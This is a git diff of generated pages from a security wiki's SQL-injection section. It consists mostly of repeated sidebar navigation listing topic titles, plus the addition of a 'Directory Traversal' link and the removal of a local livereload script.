      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -223,22 +223,6 @@

DNS Lookups

- - diff --git a/docs/Exploitation/Web/SQL Injection/Defences.html b/docs/Exploitation/Web/SQL Injection/Defences.html index 8bc8609d..82a36908 100644 --- a/docs/Exploitation/Web/SQL Injection/Defences.html +++ b/docs/Exploitation/Web/SQL Injection/Defences.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -195,22 +195,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Exploitation/Web/SQL Injection/Finding SQLi.html b/docs/Exploitation/Web/SQL Injection/Finding SQLi.html index e662eae6..4742b7f2 100644 --- a/docs/Exploitation/Web/SQL Injection/Finding SQLi.html +++ b/docs/Exploitation/Web/SQL Injection/Finding SQLi.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
